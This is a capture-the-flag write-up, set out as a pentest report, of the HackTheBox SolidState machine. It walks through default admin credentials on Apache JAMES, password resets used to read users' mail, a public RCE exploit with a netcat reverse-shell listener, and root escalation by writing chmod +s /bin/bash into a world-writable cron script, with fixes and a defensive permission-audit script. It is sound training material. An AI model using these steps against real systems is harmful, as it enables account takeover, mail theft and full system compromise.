SolidState CTF Writeup

Writeup presented by Behind Security as part of the Road to OSCP series, focusing on the SolidState CTF from HackTheBox.

SolidState CTF

SolidState is a medium difficulty machine that requires chaining of multiple attack vectors in order to get a privileged shell.

Executive Summary

Introduction

This pentest report documents the results of the security assessment conducted against the IP address 10.10.10.51. The assessment aimed to identify vulnerabilities within the target infrastructure and evaluate the resulting security risks.

Objective

The primary objective of this security assessment was to identify vulnerabilities, exploit them, and assess the potential risks to the target system. The evaluation focused on the James Mail Service 2.3.2 and related services.

Requirements

The assessment included:

  • Identifying vulnerabilities within the James Mail Service 2.3.2.
  • Exploiting these vulnerabilities to evaluate potential security risks.
  • Assessing the possibility of unauthorized access and data disclosure.
  • Providing recommendations to mitigate identified vulnerabilities.

High-Level Summary of Found Vulnerabilities

James Mail Service 2.3.2

  1. BS01 - Default Credentials (High): Behind Security successfully logged in to the JAMES Remote Administration Tool 2.3.2 using default credentials (root:root). This access allowed for listing valid users and changing user passwords.

  2. BS02 - Sensitive Information Disclosure (Elevated): By abusing default credentials in the JAMES Remote Administration Tool, Behind Security accessed and read sensitive emails on port 110.

  3. BS03 - Outdated Software and Remote Code Execution (High): The JAMES Remote Administration Tool 2.3.2 was found to have an Authenticated Remote Code Execution (RCE) vulnerability. Exploiting this vulnerability with default credentials resulted in gaining full control of the system.

  4. BS04 - Initial Access - SSH Credentials (High): Sensitive emails revealed SSH credentials for user "mindy," which allowed Behind Security to establish an SSH connection.

Post Exploitation

  1. BS05 - LPE to root (Local Privilege Escalation to root) (Extreme): Behind Security identified an unusual world-writable Python script (/opt/tmp.py) owned by root, which automatically cleared entries in the /tmp folder. By injecting malicious Python code into the script, full root access was obtained.

Recommendations

  1. Change Default Credentials: Immediately change the default credentials (root:root) for the JAMES Remote Administration Tool to strong and unique passwords.
  2. Reset Passwords: Reset the passwords of all affected users and inform them of the changes.
  3. Update Software: Promptly update the JAMES Mail Service to the latest secure version to address known vulnerabilities.
  4. Change SSH Credentials: Change the SSH credentials for user "mindy" and notify the user of the change.
  5. Remove Unnecessary Scripts: Eliminate or disable unnecessary scripts or tools without legitimate use.
  6. Review Permissions: Review and adjust file permissions to restrict write access to sensitive scripts.

Methodology

The assessment encompassed service enumeration, vulnerability identification, exploitation, and post-exploitation activities. Vulnerabilities were identified, exploited, and recommendations provided to enhance security and mitigate risks.

Color Legend

Standard console text
Commands inputted by the pentester
Text that we want to highlight
{...} Abbreviated output for brevity

Risk Classification

Risk Classification from http://www.pentest-standard.org

Independent Challenge - 10.10.10.51

export IP=10.10.10.51

Service Enumeration

IP Address     Ports Open
10.10.10.51    TCP: 22, 25, 80, 110, 119, 4555

It is important to note that port 4555 is only discovered by a full port scan, as it is not in nmap's default port list: nmap -sC -sV -T4 10.10.10.51 -p- -vv

James Mail Service 2.3.2

BS01 - Default Credentials

Vulnerability Explanation: Behind Security was able to log in to the JAMES Remote Administration Tool 2.3.2 on port 4555 with default credentials (root:root). With this access, Behind Security listed all valid users and was able to reset any user's password at will.

Vulnerability Fix:

  1. Change Default Credentials: Immediately change JAMES Remote Administration Tool credentials (root:root) to a strong and unique password.

Severity: High

Steps to Reproduce the Attack:

  1. Use telnet 10.10.10.51 4555 to connect, and when prompted for the login ID and password, type root for both.

BS02 - Sensitive Information Disclosure

Vulnerability Explanation: Behind Security changed users' passwords by abusing the default credentials on the JAMES Remote Administration Tool and was able to read sensitive emails from the Solid State Security team on port 110.

Vulnerability Fix:

  1. Change Passwords: Reset the passwords of all affected users and notify them of the change.
  2. Fix BS01.

Severity: Elevated

Steps to Reproduce the Attack:

  1. Use telnet 10.10.10.51 4555 to connect, and when prompted for the login ID and password, type root for both.
  2. Run listusers to see all valid users on the mail system.
  3. Change a user's password using setpassword [username] [password].
  4. Log in to the POP3 instance on port 110 using the new password.
  5. List and read emails by running LIST and then RETR [id].

(Screenshot: changing users' passwords)
(Screenshot: user 'mindy' credentials exposed)

BS03 - Outdated Software and Remote Code Execution

Vulnerability Explanation: JAMES Remote Administration Tool 2.3.2 is prone to an Authenticated RCE vulnerability, and public exploits are available. Because the service still uses default credentials, any remote attacker could exploit this flaw with ease. Once the exploit has been planted, any user who subsequently logs in to the machine (via SSH, for example) is compromised, and the attacker can run commands on their behalf. Behind Security was able to bypass the shell restrictions placed on the user "mindy" and gain full bash capabilities by receiving a reverse shell connection.

Vulnerability Fix:

  1. Update Software: Immediately update the JAMES Mail Service to the latest secure version to fix known vulnerabilities.

Severity: High

Steps to Reproduce the Attack:

  1. Download this public exploit.
  2. Run it against 10.10.10.51, specifying your tun0 IP address to receive the reverse connection: python3 exploit.py 10.10.10.51 YOUR-TUN0-IP 9001.
  3. Run a netcat listener: nc -lvnp 9001.
  4. Log in to the machine (refer to BS04).

BS04 - Initial Access - SSH Credentials

Vulnerability Explanation: Behind Security was able to read sensitive emails of the user "mindy." One of the emails discloses the credentials for the user to log in via SSH. The credentials were still valid at that point in time, and Behind Security established an SSH connection successfully.

Vulnerability Fix:

  1. Change SSH Credentials: Immediately change the SSH credentials for user "mindy" and notify the user of the change.

Severity: High

Steps to Reproduce the Attack:

  1. Change Mindy's password and read the emails by exploiting the BS02 vulnerability above.
  2. Log in via SSH using Mindy's temporary password: ssh mindy@10.10.10.51.

Post Exploitation

BS05 - LPE to root

Vulnerability Explanation: Behind Security noted the presence of an unusual Python script located at /opt/tmp.py, which simply clears all entries in the /tmp folder. The script is owned by root but is world-writable, which means that everybody can write to it. Behind Security created a file in /tmp to see if the script was indeed running automatically to clear the folder, and it was. After editing the script to include malicious Python code, Behind Security gained root access to the machine, taking complete control over the environment.

Vulnerability Fix:

  1. Remove Unnecessary Scripts: Remove or disable unnecessary scripts or tools that have no legitimate use.
  2. Permissions: Review and adjust file permissions to restrict write access to the script.

Severity: Extreme

Steps to Reproduce the Attack:

  1. Navigate to /opt: cd /opt.
  2. Use the cat <<EOF heredoc technique to overwrite the tmp.py script: cat <<EOF > tmp.py.
  3. Insert any malicious Python code as needed, for example (don't forget to end with EOF to write the file):
         import os
         os.system("chmod +s /bin/bash")
         EOF
  4. Wait for at least one minute, and then run /bin/bash -p. You can use watch ls -l /bin/bash to monitor the permissions of /bin/bash in real time.

Proof of Exploitation: REDACTED user.txt and root.txt
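A defender-side check for the BS05 pattern, added here as example code that is not part of the original writeup: it walks a directory for scripts that users other than the owner can modify (the state /opt/tmp.py was found in) and strips the offending write bits, the fix given above. The directory layout and file names are constructed in a temporary folder so it runs without root.

```python
# Added example (not from the original writeup): audit a directory for scripts
# that users other than the owner can modify, the misconfiguration behind BS05.
import os
import stat
import tempfile
from pathlib import Path

SCRIPT_SUFFIXES = (".py", ".sh", ".pl", ".rb")

def unsafe_write_bits(mode: int) -> list[str]:
    """Reasons a file with this mode is dangerous when root executes it."""
    reasons = []
    if mode & stat.S_IWOTH:
        reasons.append("world-writable")
    if mode & stat.S_IWGRP:
        reasons.append("group-writable")
    return reasons

def find_modifiable_scripts(root: Path) -> list[tuple[Path, list[str]]]:
    """Scripts under root that anyone besides the owner could edit."""
    findings = []
    for path in sorted(root.rglob("*")):
        # skip symlinks: a local user could point one at a harmless file
        if path.is_symlink() or not path.is_file() or path.suffix not in SCRIPT_SUFFIXES:
            continue
        reasons = unsafe_write_bits(path.stat().st_mode)
        if reasons:
            findings.append((path, reasons))
    return findings

def harden(path: Path) -> int:
    """Drop group/other write bits (Vulnerability Fix 2 for BS05); return the new mode."""
    mode = stat.S_IMODE(path.stat().st_mode) & ~(stat.S_IWGRP | stat.S_IWOTH)
    os.chmod(path, mode)
    return mode

def demo() -> tuple[list[str], list[str]]:
    """Constructed /opt look-alike in a temp dir: world-writable tmp.py beside a sane script."""
    with tempfile.TemporaryDirectory() as d:
        opt = Path(d)
        (opt / "tmp.py").write_text("import os\n# stand-in for /opt/tmp.py\n")
        os.chmod(opt / "tmp.py", 0o666)      # the misconfiguration found on the box
        (opt / "backup.sh").write_text("#!/bin/sh\n")
        os.chmod(opt / "backup.sh", 0o755)   # owner-only write: fine
        before = [p.name for p, _ in find_modifiable_scripts(opt)]
        for p, _ in find_modifiable_scripts(opt):
            harden(p)
        after = [p.name for p, _ in find_modifiable_scripts(opt)]
    return before, after
```

Run against a real host, point find_modifiable_scripts at /opt and at the directories referenced from the cron tables; demo() returns the findings before and after hardening.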

Conclusion

We hope you have found our content on SolidState CTF useful and invite you to explore more of our website to discover other interesting topics we cover. From cybersecurity to programming, we strive to provide our readers with the latest and most relevant information that can help them stay informed and ahead of the curve. We are committed to providing the best user experience to you and are open to feedback and suggestions through our contact form. Thank you for choosing Behind Security, we hope to see you again soon! 
